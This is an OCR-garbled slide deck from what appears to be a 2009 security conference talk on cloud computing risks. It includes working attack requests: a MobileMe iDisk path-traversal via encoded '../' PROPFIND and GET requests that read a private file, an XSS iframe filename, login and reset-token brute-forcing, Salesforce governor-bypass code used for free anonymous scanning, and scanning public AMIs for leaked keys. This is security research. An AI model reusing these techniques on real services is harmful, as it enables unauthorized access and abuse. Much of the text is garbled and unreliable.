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This is not the time to split hairs 




The LOUD in cLOUD security.. 



A bunch of people are talking about "the 
cloud" 

There are large numbers of people who 
are immediately down on it: 

"There is nothing new here" 

"Same old, Same old" 

If we stand around splitting hairs, we risk 
missing something important.. 
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So, what 




Cloud delivery models 



Cloud Taxonomy & Ontology - Draft v1 .4 - Hoff 
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Why would we want to break it? 



It will be where the action is.. 

Insidious the dark side is.. 

Amazingly we are making some of the 
same old mistakes all over again 

We really don't have to.. 
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What is driving Cloud adoption? 



Management by in-flight magazine 

- Manager Version 

- Geek Version 

Poor history from IT 

Economy is down 

- Cost saving becomes more attractive 

- Cloud computing allows you to move from 
CAPEX to OPEX 

- (Private Clouds?) 
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A really attractive option 



EC2 is Cool! 
Like Crack.. 
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Problems testing 
the Cloud 




Transparency 



The problem, more than anything else, is a 
would have spoken up against it -- but Arm 
works or what kinds of control the ccrnparv 

Why lias Amazon been less transparent thi 
Amazon controls the whole system. Systen 
to tell the thind- party ceve opers how the sv 
ccnflict with third-party applications. Alterr 
than (say) a PC. Less functionality means 
themselves. 

Going forward, Amazon will face more p F e 
with Kindle buyers. It seems that e-bocks 




krown that this sort of thing were pcssisle, they 
coes cfter clear c'escptons of how the product 



e offer two conjectures. It might be because 
;c be moie open, in the sense that they have 
re to avo : c" gratuitous changes that might 
because the Kirdecffers less functionality 
need as much information to protect 



techrology anc the company's relationship 
ree -oo^s. 



cioudsecurity.org: Trust is often cited as a barrier to enterprise adoption of Cioud Computing. What rde do you 

npr^/insJJTi^ Wn/nAr r^rh^n}^ ran n)air in Jbrj/Jrtfnn Jfw^ J/tjcW 

cloudsecurity.org: How do you contain an attacker that exploits bugs in App Engine from exploiting the underlying OS 

C and potentiafiy interfering with other users processes or attacking backend systems? 
n 

GvR: You are correct that there are strong measures In place, but I'm not at liberty to discuss details. 
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Compliance in the Cloud 



"If its non-regulated data, go ahead and 
explore. If it is regulated, hold on. I have 
not run across anyone comfortable putting 
sensitive/regulated data in the cloud" 

"doesn't seem to be there as far as comfort 
level that security and audit aspects of that 
will stand up to scrutiny" (sic) 

-- Tim Mather: RSA Security Strategist 
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Privacy 



Jim Dempsey (Center for Democracy and 
Technology): "Loss of 4 th Amendment 
protection for US companies" 

A legal order (court) to serve data, can be 
used to obtain your data without any 
notification being served to you 

There is no legal obligation to even inform 
you it has been given 
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Simple solution 



Crypto Pixie Dust! 




!» 




Would you trust crypto on an owned box ? 
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Vendor Lock-in 



Pretty self-explanatory 

If your relationship dies, how do you get 
access to your data ? 

Is it even your data ? 




flickr 
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Availability [Big guys fail too?] 



J- Brett Viewppgfie 
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We're performing routine maintenance & updating our site and will be back online shortly. 
This mainteance window will last from 6PM PDTto 9PM PDT. During this time, all your data is 100% secure. 

Sorry for any inconvenience. 
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No ma Desk versus Omnidrive 




o 



About us Support W UveHelp (online) Contact Tel +1 800 409 3830 



NDMADESK 



Customr Casas 



Omnidrive is no longer available, we recommend NomaDesk 



Welcome to NomaDesk . We develop a document collaboration software for 
geographically dispersed professionals who need secure access to shared files 
daily. NomaDesk was founded in 2004 by FiNp Tack, its current CEO, along 
with CTO Miguel De Buf and COO Pater Geldhof. Based in: Gent, Belgium, [he 
company Is supported by Glmv, a European independent Investment company. 
NomaDesk has offices and datacenters in the US and Europe. 

We are not affiliated with Omnidrive , We feel compelled to maintai" the 
domain name because we are convinced of the business value of a Software- 
aa-a -service to share, synchronize and backup business critical data, so do 
thousands of SMB customers that use NomaDesk on a daity basis. NomaDesk 
has and will be running Its service for years to come. You are kindly invited to: 

» Check out our product offering 
j> Download your 30 day free :rial 
,-. Contact cuslflmor support ar a s-alos representative 
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Availability [not just uptime!] 



Account Lockout? 



"Malicious activity from your account" 
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Monoculture 
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Monoculture 



MonocultureGate is well known in our circles. 

Just viewing that pic resulted in a raised average 
IQ in this room. 

His (their) thesis: 

"A monoculture of networked computers is a convenient 
and susceptible reservoir of platforms from which to 
launch attacks; these attacks can and do cascade. " 

Most people agreed with Dr Geer (et al) back 
then.. 

Just because its not Windows, doesn't mean the 
thesis disappears. 
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SmugMug Case Study 




Process 50+ terapixels per day 

PosterchildofAWS 

Heavy use of S3 and EC2 

Launched 1920 standard instances in one 
call 

You don't get monoculture'er than -2000 
machines that are all copies of the same 
image.. 

ASLR Fail .. ? 
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While we're 



talking 
about 



phishing 






Trust 
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Cloud #fail 



Media Max Online Storage - inactive 
account purging script error whacked 
active customer accounts 

Nokia Ovi (like MobileMe) lost 3 weeks of 
customer data after crash 

Jan 2009 - SF.com customers couldn't log 
in - "core network device failed with 
memory allocation errors" 



[SensePost-2009] 



<#> 



But you have to trust someone! 



<+ben> kostyas cloudbreak stuff really scares 
me 

<+MH> its impressive for sure, but why would 
that scare you more than simple Amazon 
evilness ? (Malfeasance) 

<+ben> You have to trust someone.. Just like 
how you trust Microsoft not to backdoor your 
OS, you trust Amazon not to screw you 
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Red Herring Alert! 
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Complete the popular phrase. 



Trust, but ! 

Reverse Engineers keep Microsoft honest 

(or at least raise the cost of possibly 
effective malfeasance) 

Even "pre-owned" hardware is relatively 
easy to spot (for some definition of easy) 

But how do we know that Amazon (or 
other big names) "Wont be evil"™ 
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Crypto AG: The NSA's Trojan Whore? 



by Wayne Mad sen 

FOR AT LEAST HALF A CENTURY, THE US HAS BEEN 

INTERCEPTING AND DECRYPTING THE TOP SECRET 

DOCUMENTS OF MOST OF THE WORLD'S GOVERNMENTS 



Using the Cloud 



For haxOr fun and profit: 

- Dino Dai Zovi vs. Debian 

- Ben Nagy vs. MS Office 

- Dmolnar && Zynamics 
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ebian 



<£> 



DDZ vs Debian 



1. Populate a distributed queue with 
strings describing which keys to 
generate 

2. Launch 20 VMs (the default limit) 

3. Fetch key descriptors from queue, 
generate batches of keys, and store 
in S3 

524,288 RSA keys - 6 Hours - $16 
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Metafuzz "Harness" 



Production 1 



Production 2 




Production n 




Fuzz Server 




Delivery 1 



Delivery 2 




Delivery n 



r ^ 


/fuzzfiles. 
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crash-n.doc 

A 



Private & CrjnfidsnCial 
Property of COSE INC 



Zynamics && DMolnar 



Zynamics use EC2 to demo software and 
classify malware, upto ~50k samples/day 

David Molnar and friends fuzztest Linux 
binaries, sift results and notify devs, all on 
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Some of the players 
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icloud 






Autoscaling / Usage costing 



Autoscaling is a great idea for companies. 
Wall Street & Amazon EC2 
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Jib 
Can you spot 






Google AdSense 




extern bloq Scnsefhsfj 
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Storage as a Service 



In most cases this is a really simple model 

Faster Internet tubes is making backing up 
over tubes reasonable 

Disk access anywhere is a nice idea 

All throw crypto-pixieDust-magic words in 
their marketing documents 

For good measure all throw in Web based 
GUI access 
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Web Apps 



File Systems 
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Amazon EC2 



Secure Wiping 




« 



steekR Shared Space Notification inba* |x 

rmcree to me 



> My shared space 

My Documents 
' M "xiframe src=http://xssed.corn> 



\ Parent folder Select : All , None Sort by : Name ^ View : gg 




"xiframe src=Kh. . .com> 



k/fe§ss(H> 




XSS Archive | XSS Archive * | TOP Si 



show details 1:20 PM [36 minutes ago) 4j Reply ▼ 





MobileMe: yourOtsk is myDisk 

by jrlchards on Jul. 03. 2009. under Uncategorlzed 
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.response 



POST /] " 
Host: idisk 
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raw headers hex rend 



ftOO 



Jeremy, rkhards 



ss | | an 


urn 



o #- 
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DEVICES 

^ Macintosh HD 

g§ BOOTCAMP 
i iPhone SDK 
■ NEW 
Personal DataSS. 

► SHARED 

T PLACES 

B Desktop 

f^f jeremyrichards 

5^b Applications 

Downloads 
f Documents 



? 



Z 



Name 
] Backup 

▼ CD Documents 

Library 
Movies 
Music 

► CD pass 

► LJ Pictures 

PRIVATE.txt 

► LJ Public 

► D Sites 

► CD Software 

▼ CD untitled folder 



Date Modified 
Yesterday, 8: 
Yesterday, 7: 
Yesterday, 9: 
Yesterday, 7: 
Yesterday, 7: 
Yesterday, 7: 
Yesterday, 7: 
Yesterday, 6: 
Yesterday, 7: 
Yesterday, 7: 
10-Jul-08, 4 
Yesterday, 5 



46 PM 
32 PM 
28 PM 
32 PM 
32 PM 
17 PM 
32 PM 
13 PM 
32 PV 
32 PM 
:11AM 
08 PM 



Size 



1 KB 



Kind 

Folder 

Folder 

Folder 

Folder 

Folder 

Folder 

Folder 

Plain text 

Folder 

Folder 

Folder 

Folder 



L2 items, 10 GB av-i lable 



A 



E.txt 
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.response 



POST /] " 
Host: idisk 
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raw headers hex rend 



«oo 



PRIVATE, txt 



This is a private file that Lives outside the 
not be accessible from a Public folder. 



'Public folder". It should 



/a 
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POST /] " 
Host: idisk 



request 



GET /jerem^ 
Host: idisk. 
User-Agent 
Accept: text 
Accept-Lan 
Accept-Enc 
Accept-Chc 
Keep- Alive: 
Proxy- Conr 
Referer: htt| 



L 



done 
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raw headers hex rend 



POST /Jeremy, ri chards-Publi c/<strong>%2E%2E%2F/</strong>?webdav- 


-method=PROPFIND HTTP/1.1 




Host : i di sk . mac . com 






User-Agent: Mozilla/5.0 (Macintosh; Uj Intel Mac OS X 10.5; en-l 


JS; rv:1.9.0.11) Gecko/2009G 


)60214 


i refox/3.0.11 






Accept: text/html, application/xhtml + xml,application/xml;q=0.9..*.- 


; *;q=0.3 




Accept-Language : en-us, en; q=0 . 5 






Accept-Encoding: gzip, deflate 






Accept-Charset: ISO -38 59-1, utf -3; q=0 . 7, *; q=0 . 7 






Keep-Alive: 300 






P roxy- Connect i on : keep-ali ve 






Depth: 1 






Content-Type: text/xml; charset=UTF-3 






Referer : http : //i di sk . mac . com/ Jeremy -Publi c?vi ew=web 






Pragma: no-cache 
Cache-Control: no-cache 

rnnf flnf 1 anrr f k ■ 1 flfl 






Lon ten i - i_eng in . 100 

<?xml version="1.0" encodi ng="utf -3"? > 






<D:propfind xmlns : D="DAV : " > 






<D : prop> 






<D:getlastmodified/> 






<D:getcontentlength/> 






<D : resourcetype/ > 






<D:getcontenttype/> 






</D:prop> 






</D : propfi nd> 
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HTTP/ 1.1 207 Multi -Status 
Server: Apple I Di skServer-lE2012 
x-responding-server: idiskng075 
X-dmUser : jeremy.richards 
Content-TvDe: text/xml:charset=i 



Date: Wed, 01 Jul 
Connection: close 



15:41:03 GMT 



m="1.0" encoding="utf-S" ?> 
:multi status xmlns="DAV: "> 
D: response xmlns : D="DAV : " > 

:remy.richards-Public/. . /</D 
<D:getlastmodified>Wed J 01 Ju 
<D:status>HTTP/l.l 200 0K</D : status* 



etlastmodi f n ed> 



D: i 


-espon; 


>e xmln* 


;:D 


="DAV: 


" > 




<D 


:href >; 


' j eremy , 


ri 


chards 


-Public/ . 


./ .Groups/</D:href > 


<D 


:href>, 


' j eremy , 


ri 


chards 


-Public/ . 


./Backup/</D:href > 


<D 


:href >; 


'j eremy , 


ri 


chards 


-Public/ . 


./Documents/</D:href > 


<D 


:href>, 


; j eremy , 


ri 


chards 


-Public/ . 


./Library/</D:href > 


<D 


:href >; 


' j eremy , 


ri 


chards 


-Public/ . 


./Movies/</D:href > 


<D 


:href >; 


'j eremy . 


ri 


chards 


-Public/ . 


./Music/</D:href > 


<D 


:href>, 


; j eremy , 


ri 


chards 


-Public/ . 


./Pictures/</D:href > 


<D 


:href >; 


' j eremy , 


ri 


chards 


-Public/ . 


./Public/</D:href> 


<D 


:href >, 


' j eremy , 


ri 


chards 


-Public/ . 


./Si tes/</D:href> 


<D 


:href >; 


' j eremy , 


ri 


chards 


-Public/ . 


./unti tled%20folder/< 


<D 


:href >; 


' j eremy , 


ri 


chards 


-Public/ . 


./ .DS Store</D:href> 


<D 


:href>, 


' j eremy , 


ri chards 


-Public/ . 


./PRIVATE. txt</D:href 


<D 


:href >; 


'j eremy , 


ri 


chards 


-Public/ . 


./ .Temporary I tems/</D 


<D 


:href>, 


; i eremv , 


ri 


chards 


-Public/ . 


./oass/</D:href > 
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response 



RHO __ ^ burp suite vl,l professional - licensed ten ^single user license] 



burp intruder repeater window help 



proxy spider intruder repeater sequencer decoder comparer comma alerts \ 



9Q hD5t idisk.mac.com 

( < ~) C > 3 pon [&Q~ use SSL 



request 



f raw params headers hex 



GET /jertmvrichards-ftiblic/tt2E%2Eft2FPRI VATE.t*t|?disposition=download+B300 HTTP/ 1. 1 

Host: idisk-mac.com 

User-Agent: Mozilla/5.0 (Macintosh; U: Intel Mac OS X 10.S; en-US; rv:1.9.0.11} Cecko/2009Q6Q214 Firefox/ 3.0.1 1 

Accept: text/html H applicationy«hlml+xrTil,dpplication/sml;q=O.9 1 *y*,q=0.8 

Accept- Language: en-us,en:q-0-5 

Ace ept - Encodi ng : gz i p, def I at e 

Accept-Charser ISO-S&59- l,utf-8;q-0 V;q-0.7 

Keep-Alive: 300 

Proxy-Connection; keep- alive 

ReFerer http:/ f idisk.mac.com/jeremv.richards-Public7viewBweb 






| > | matches 



< > 



done length: 457 



A 
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response 



response 



1 raw headers hex render '. 



HTTP/1.12Q0OK 

Server: ApplelDisk3erver-lE2G12 

x-responding-server: idiskngOZS 

X-dmUser: jererny.rfchards 

ETag:"u-lg3sl8hn-3e0p-1372yjpvf7-2b6d9rze2c0" 

Last-Modified: Wed, 01 JuF 2009 15:37:03 CMT 

Content-disposition: attachment; 

Content-Type: text/ plain 

Content-Length: 114 

Date: Wed, 01 Jul 2009 15:46:34 CMT 

Connection: close 

This is a private file that lives outside the "Public folder". It should not be accessible from a Public folder. 



href 



matches 
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username=bob&password=cat 



<html> 
<body> 




So"y! Please chec* your 
passwo'c and try ag an 




<Jbocy> 
</htrrl 





^n 






http://ban<.GOTi/logr 
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username=bob&password=dog 



<html> 
<body> 




So"y! Please chec* your 
passwo'c and try ag an 




<Jbocy> 
</htrrl 





^n 






http://ban<.GOTi/logr 
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username=bob&password=fish 



<html> 
<body> 

Welcome Bob! 

</bocy> 
</html 



^n 






http://ban<.GOTi/logr 
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username=bob&password=thiscannevereverberight 



<htnl> 
<body> 

Sorry! Please chec* your 
pass wo 'c and try aga n 

</bocy> 
</html 



Page-Sig: 0123384 



1 






http://ban<.GOTi/logr 
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username=bob&password=fish 




<htnl> 
<body> 

Sorry! Please chec* your 
pass wo 'c and try aga n 

</bocy> 
</html 



Page-Sig: 0123384 
Page-dlff: 0.23213 
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http://ban<.GOTi/logr 



<#> 



username=bob&password=thiscannevereverberight 




username=bob&password=dog 



^n 






Failed Login 

I pdissw-j't, dirij try aya n i 

username=bob&password=dog 



http://ban<,coTi/lQgr 



Failed Login 
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username=bob&password=fish 




username=tom&password=fish 



username=sam&password=fish 



username=rick&password=fish 






http://bank.oorn/logr 



username=carp&password=fish 




<#> 



username=bob&password=fish 




SessionlD:ADSFERDFGDGDSDDFDSFSDFDSF 

I L 



<html> 
<body> 

Welcome Bob! 

</Eocy> 
</htrrl 






n 



http://bank.oorn/logr 



GET /balance 
Cookia:ADSFERDFGDGDSDDFDSFSDFDSF 



Balance = $123342342423 
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GET /balance 
Cookie: AAAAAAAAAAAAAAAAAAAAAAA 



S GET /balance 

Cookie: AAAAAAAAAAAAAAAAAAAAAA 



GET /balance 
Cookie: AAAAAAAAAAAAAAAAAAAAAA 



GET /balance 
Cookie: ZZZZZZZZZZZZZZZZ 



n 



http://bank.oorn/logr 



Balance = S1 23342342423 
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x> 







1 



http://banKx.ori/lQgr 



tf>iV 









ogi" 
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file:///Users/haroon/Desktop/Vegas Video/ 

sugarsync/sugarsync-proj/sugarsync- 

proj.html 



Overview of sugarsync + normal password 
reset 

Ends with sample link.. 
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Its Short, Brute & Declare Victory 



?secret = for472gtb422 

= lower case alphanumeric 
= 35 A 12 

= Still a too big number © 



Birthday Attack ? 

= 1.2*sqrt(35 A 12) 

= Still a pretty big number 
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We Have 2 Days.. 



single thread 


: 1 hour : 


: 648 




: 2 days : 


: 31104 


10 threads 




: 221472 


10 machines 




: 2 214 720 



Wont they notice ? 
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Saved (some pride) 



[sugarsync vids] 
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PaaS 
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Actually.. 



SF.com is both SaaS and PaaS 

We took a quick look at SaaS 

Good filtering, and held up well to cursory 
testing 

Why cursory? 

Ultimately, it *is* a web application.. 
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Clickjack 



[clickjack vid] 
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SalesForce back story 



, . sales/orce.com 

lU VGSirS OlCl J Success. Not Software. 

Initially web-based CRM software 

- 59 000 customers 
-$1 billion in revenue 

Distributed infrastructure was created to 
support CRM (SaaS, weeeee!) 

Platform was exposed to architects and 
devs, for PaaS and laaS 

- (Ambitious project with solid aims) 
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Salesforce business model 



Multi-tenant 

- Customers share infrastructure 

- Spread out across the world 

Subscription model 

- Scales with features and per-license cost 
Free dev accounts 

- More limited than paid-for orgs 

AppExchange 

- Third party apps (ala App Store) 
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JJ 
19 

20 

21 

— 
24 
25 



2 
3 



6 

7 
8 

10 

:: 

12 

— 



apex: page 
<htnd> 

<head> 

<titlo>ViaualForGO Itorator</title> 
</head> 
<body> 

<hl>Page Content Follows {we don't expeot to get here, btw)</hl> 
{ IpageData} 
</body> 
</htnd> 
</apexipage> 




9 

10 
11 
12 
13 
14 
15 
16 
17 
18 
19 
20 
21 
22 
23 
24 
25 
26 
27 
26 
29 
30 
31 



<e 



public void nextLoop( Integer counter) { 

Email Iterator Ob j c o = [select id, counter c from Email Iterator Ob j c where name= ' looper ' ] [ ] ; 

o « counter c= counter ; 

update o? 

> 

//called to initiate loop termination 
public void endLoop(){ 

insert new Message c(MsgType c=Messages.ENDLOOP) ; 

> 

//called right at the end of a set of loop iterations 
public void cleanup { ) { 

//clean out the email iterators objects 

for ( Lis t<Email Iterator Ob j c> o: [select id from EmaillteratorObj c]){ 

delete o; 
} 

//clean out messages 

for (List<Message c> oi [select id from Message c]){ 

delete o? 

} 



Position: 



Ln173.Ch2 



Total: Ln 1 73, Ch 6239 



Other language features 



Make HTTP requests 

Bind classes to WS endpoints 



Can send mails 

Bind classes to mail endpoints 



Configure triggers on datastore activities 
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Multi-tenancy. .. 



an obvious problem for resource 

sharing 
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The Governor 



Each script execution is 
subject to strict limits 

Uncatchable exception 
issued when limits 
exceeded 

Limits based on entry point 
of code 

Limits applied to 
namespaces 

- Org gets limits 

- Certified apps get limits 



Published Limits 




2. Running time 

3. ??? 
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Apex limitations 



Language focused on short bursts of execution 
Can't easily alter SF configuration 

- Requires web interface interactions 

APIs short on parallel programming primitives 

- no explicit locks and very broad synchronisation 

- no real threads 

- no ability to pause execution 

- no explicit shared mem 

API call order important 
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Workarounds 



public static void sleep(Integer sees ) { 

S ys tern. debug ( ' Entered sleep { ' +secs+ ' ) ' ) " 

Datetime tl = System^nowf ) ; 

Date time t2 = System, now( ) ; 

Double j,k=2; 

while { t2, get Time ( )-tl.getTime( ) < secs*1000) 

12 
13 
14 
15 
16 
17 
18 } 

System. debug ( Leaving sleep ( ) ' ) ; 
} 




i Math . cbrt ( Math .cbrt ( Math . i 

t ( Math . cbrt ( Math . cbrt ( Math 



cbrt (Math 



cbrt ( Math . cbrt ( Math . cbrt ( Math 
cbrt ( Math . cbrt ( Math . cbrt ( Math 

^K -k"-l- / TUT a 4- lh jrn, Vv-i^+ / TUT a +- "k j"i Ki"*- / HI -a 4- K 



if ( 1 secondarythread ) { 
24 //hack to detect when lock counter was changed while we waited for writelock^ 

if { pr i or ■ locknum c == lck ■ locknum c \ { 
26 //all looks good, let's first sleep to enforce a single thread of execution at the end of this time window 

Uti 1 s . s leep ( wi n daw ) ? 
lck « locknum c+= 1 ; 
update lck? 
luckines s=true ■ 

> 

> 

return luckiness; 
} 



Threads? 
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Bypassing the governor 



wJ ^ 



global class WStowa1or{ 



^ 



si 



Cite 'ate vi aerr ai ® /4dc tsc h \wo hw ^\ 
pxcir944C*d*.in.B6 eEferce.cori _^y' 




t 



Apex Invokec 

~T7" 



] 






ind 



Trigger f res an enail back to Ourselves 



G 



Do stuff 




11 



Inset ob.ect with pre -del 1 nee tricge' 



Th 



WS Loop Fail 



tion 
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And so? 
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Sifto! 



Ported Nikto into the cloud as a simple e.g. 
Process 

- Class adds allowed endpoint through HTTP calls to SF 
web interface 

- Event loop kicked off against target 

• Each iteration performs ten tests 

• State simply inserted into datastore at end of ten tests 

• Trigger object inserted to fire off email for next iteration 

• Results returned via email as they are found 

Why? 

- Free! 

- Fast (for .za) 

- Anonymity 
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[sifto vid] 
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Pros / cons 



Pros 

- Fast(er) with more bandwidth 

- Free! 

- Capacity for DoS outweighs home user 

- How about SF DoS? 



Cons 

- Prone to monitoring 

- Custom language / platform 
-Technique governed by email limits 
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icetiierghtti:- mare-ol ■curl rtttpi/f*^^ dew lofwrf arcs, c«tf€irwta/^^ 
?7??jFiF?7ij;itAT0R; QO-jpeg vl.0 (using ijg JPEC n*7). default Quality 



??PhpCaptcha Object 



|. fc \t(?yjH444>±J£*.*G77C 



2i 1 222ZZ2272222222Z22ZZ2222222Z222Z22 
777} I LAG}-(tf7?lB77K7?l3&r7 

77 fel lAQaq"2B77 ?7 f »7br ? 

U ?*7i ' () ■ 5&7W : Ctt FGHI JSHJVWXYZtdtf c 



rechnical Library 






Ideas" -.are" Discussion Boards 



Developer Force sign-up 

Free Developer Edition environment 






NT T??7?H???74n???J«g77L. ?[???lv 

??? c ?tQ??zfP??^ > v ????o?E3?4?Y?7 
J J»l ?-?*?? j?jJ6?v?qV?wF*? l ?k??? 



??H6??a?9?X ?■??*??? X WRi ' 



[« linage] ■> Rtt&urce id *3 
[cFonti] => Array 
C 

[0] => fontsAferaBdJ.t 

[1] -* foma/Veralt.l 
[2] -*■ fanWVero.ttf 



[itfidth] -* 204 

[i Nun Chars] •» 5 
[\Nuii Lines] ==■ 719 



"With Force.oom, 
salesforce.oom is 
changing the idea of 
what an on-demand 
application can be." 

- Michael Dell 
Chairman of ihe Board 
Dell 



Get Started Developing on the Force.com Platform 

Just fill out the fields below and accept our ".erms of use. You'll receive a free. f ull-featured Developer Edition environment, 
access to the Fonco.com Discussion Soafds, and other powerful benefits. 



' Required Fields 
About You 

First Name:" 

Last Name:* 

Email Address:' 

Primary interest" 

Primary Job 
Role:' 

5alesforce.com 
Relationship:' 

Phone: 



| Choose c 



[ Choose one. .. 






Developer Force Membership 

A free Developer Force membership sauiltinto you r 

regi station, putting key Force .com technical inrormaition and 

free developer tools al your fingertips. 



Use ncns:* 



For Your Security 



Please enter the texi you see in the image: 

iTyou are visually impaired and cannot vlow the image | 

please contact our Suppnn team. 



About Your Company 

Country:* 
StateyProvhce 
Postal Code:* 
Company:* 



Kv?eO?????rT??U?+*7eI? 



>yd>Qr**#??\0????l?->{ 
?cvI??j-?7?]$7?ZHt???b 



' United States 






[r.i-TAntrTttft] -- - 
[aCharSet] ■*. 
[bCaseln sensitive] ■» 1 
[^Background Images] =*■ bockgr 
[iHinFsjntSii'e] -* 16 
[i Max F&nt Size] => 25 
[bUseCetfour] «* 1 
[sFileTypE] »j- jpeg 
[jCodt] -* VXJTTlf 



n | hove read and agreed to mp Master Subscription J 



[jcl lotrrUbl " 



Future Directions 



Sifto is a *really* basic POC hinting at possibilities 

- Turing complete, open field. Limited API though 

Platform is developing rapidly, future changes in this 
area will introduce new possibilities 

- Callouts in triggers for event loops 

- Reduction in limitations 

- Improvements in language and APIs 

Abstracted functionality on *aaS makes usage easier, 
but impact remains 

Security is transferred into hands of non-security 
aware C-levels, ouch. 

Rootkits 

Security community interaction 
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f|g» amazon 

M web services 



[SensePost-2009] 



<#> 




Yes... it's that 
cool... 



ost - 2009] 
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The Pieces (that we will touch).. 



-EC2 

-S3 

-SQS 

- DevPay 
What we ignore: 

- SimpleDB 

- Elastic IP 

- CloudFront 

- Elastic MapReduce 

- Mechanical Turk 
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Root access to a Linux machine in seconds 
Scalable costs.. 




periberubi — zuu^j 
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S3 



' ^ Manage Accounts aw slc&sen sepost.com $} Synchronize Folders AWS Import/ Export Preferences 



Browse 



« 



m & a 



File Name 



Modified Time 



Q|jDS_5tore 

l3 Spotlight- V100 

^/T Fashes 



13 







06/02/2009 09:42 PM 
06/13/2009 07:00 PM 
04/14/200S 04:59 PM 
04/L4/2003 04:36 PM 



~m 



o 
o 



' 



i_;spscan4 
, _jspscan3 
i lspscan2 

^spscan 
Osplogs 
Qspl 
Qqscan 
^«fedora_ll_full 
L"^ copy- 2 

Jcopy-L 
_J ama z.o n_fe d o r a_8 



|[File Size(KB) 














B £* 1 x] 

I Upload Time 



05/17/2009 10:29 PM 
05/17/2009 02:11 PM 
05/17/2009 00:43 AM 
05/16/2009 01:36 PM 
05/19/2009 04:57 AM 
05/16/2009 11:43 AM 
O5/1S/2009 06:Z3 PM 
07/15/2009 03:34 PM 
07/20/2009 10:44 PM 
07/20/2009 10:11 PM 
07/15/2009 02:25 PM 



S 



Current Tasks: 



[ Regular Transfer | Synchronized Folders Transfer Log 



File Name 



From 



J^ Clear QQ Pause V Clear Completed Q Retry Tailed Tasks 
| Type 



To 



•Progress 
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^ 




5 Billion 



800 Million 



^H 




HHI 


14 Billion 


10 Billion 



August 06 April 07 October 07 January 08 
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Amazon S3 



mculver-images 



media.mydomain.com 



Beach.jpg I 2005/party/hat.jpg 



■■■■I 


■ 


■■■■■ 


imgl.jpg 


1 


img2.jpg 



public.blueorigin.com 






i 



index.html 



img/picl.jpg 
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SQS 



Producer 



Producer 



U 



Consumer 




[SensePost-2009] 



<#> 



When in doubt- 



Copy Marco! 



Can we steal computing resources from 
Amazon (or Amazon users?) 



Sure we can.. 
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Breakdown 



Amazon provide 47 machine images that 
they built themselves.. 



*__*» ej— i Amazon Elastic 

Amazon EC2 K*^„a^ 

MapReduce 


Amazon 
CloudFront 
















1 Navigation 


1 Amazon Machine Images 


^^^^^^^^mar *mi 


i ° 


■ 


Region: g US-East ▼ 


.Lfli Register New AMI 


[Tj Show/Hide 


cs~ Refresh 


Help 


> EC2 Dashboard 

I M STANCES 

> Instances 


Viewing: 


1 All Images 
MUD 


ttl [ All Platforms I C 1 


1 to 50 of 2768 AMIs > >| 




Al 


Manifest Visibility Platform 


D 


i^J ami-Q022c76S level22-ec2-images/ubuntu-7.04-feisty-base-2007i 225a.manifest.xml Public 


* 5 Ubuntu _M 


D 


£l ami-005db969 alestic-64/ubuntu-8.04-hardy-base-64-20081 222.manifest.xml 


Public 


*0 Ubuntu 


IMAGES 

> AMIS 

> Bundle Tasks 


D 


i^Jami-005dba69 rbuilder-on line/new-exam pie- 1-X06 64 20l33.img.manifest.xml 


Public 


A Other Linux 


a 


:^ a m i-0 0>5e ba69 kaa vo-ntie r-d W im od-n ti er-32bi t-FC-DB . ma n ifest. xml 


Public 


A Other Linux ± 




_C"B. 




T 


i 1 
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Shared AMI gifts FTW! 



Bundled AMI'S + Forum Posts 

Vulnerable servers? Set_slice? SSHD? 

Scanning gets you booted.. We needed an 
alternative.. 
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GhettoScan 



d) 



Generate List 
or All available 
AMI'S 





Populate SQS 

with list of 

AMI'S 



Attacke' 




(7) (6) 
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Results 



ami-065eba69.fi Les : 
ami-032bcc6a.fi Les : 
ami-032bcc6a.fi Les : 
ami-135fb87a.fi Les: 
ami-135fb37a.fi Les: 
ami-135fb37a.fi Les: 
ami-135fb87a.fi Les: 
ami-135fb87a.fi Les: 
ami-2545aQ4c.fi Les : 
ami-2545a04c.fi Les : 
ami-2545a04c.fi Les : 
ami-2545a04c.fi Les : 
ami-28ac4a41.fi Les : 
ami-2ca04645.fi Les : 
ami-2ca04645.fi Les : 
ami-2ca04645.fi Les : 
ami-2ca04645.fi Les : 


> /mnt/cert.pem 

_ rw _ r __ r __ i root root 916 2009-03-11 11:21 cert-I652RSE2RKXY4ZLP7D7DUTY7V2G00WBU.pem 

_rw-r— r— 1 root root 916 2009-03-11 11:16 cert-I652RSE2RKXY4ZLP7D7DUTY7V2J00WBU.pem 

mv cert-GAZG6MLHP5G7ZLG3IH2FVBY623CLSDZC.pem /mnt 

ecd2-bundLe-voL -d /mnt -k /mnt/pk-GAZG6MLHP5G7ZLG3IH2FVBY623CLSDZC.pem -c /mnt/cert-GAZG6MLHP5G7ZLG3IH2FVBY623CLSDZC.pem -u 614813661965 -r 3386 -p dcm4chee_01 

ec2-bun"' " J J " " ' " J " ■-'— ™^ m , ^t..^.,,-^^™ ™-^ , L , ^ "'"" n™., ^,„^Mnu,^, .™ ,, ,^^,,^^ --..-.,- _,__.,. ^ 

ec2-bun /rOOt/6C2 = 
./ec2-b 

- r «-r- total 32 

Sib"" drwxr-xr-x 3 root root 4096 2069-63-11 11:21 . 

ec2- 

1 s3 haroon$ grep High *.nsr 1 wc -1 

ec2- 




ami-2ca04645.fi Les : 
ami-362acd5f .f i Les: 
ami-362acd5f .f i Les: 
ami-362acd5f .f i Les: 


§ 1293 




ami-362acd5f .f i Les: 
ami-362acd5f .f i Les: 
ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 


ec2- 

| s3 haroon$ grep Critical *.nsr | wc -1 

ec2- 


fest.xmL 


ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 
am i 399d7a50 . f i L es : 


3 646 

./ec 
ec2- 
./ec 
ec2- 


lifest.xmL 

fest.xmL 

inifest.xml 

inifest.xmL 

17 3. pern 

[AZ7J.pem 


ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 
ami-399d7a50.fi Les: 
ami-443bde2d.fi Les : 
ami-460dea2f .f i Les: 
ami-460dea2f .f i Les: 
ami-460dea2f .f i Les: 
ami-460dea2f .f i Les: 
ami-460dea2f .f i Les: 
ami-460dea2f .f i Les: 
ami-460dea2f .f i Les: 
ami-47a6412e.fi Les : 


./ec 
./ec 
./ec^-„, - - 

: r tr"" rw 1 root root 1755 2009-93-11 11:16 icLgsg-keypair 

- rw -r-_ rw i roo t root 1676 2009-03-11 11:16 id-mypairselastic 

ec2-bun 

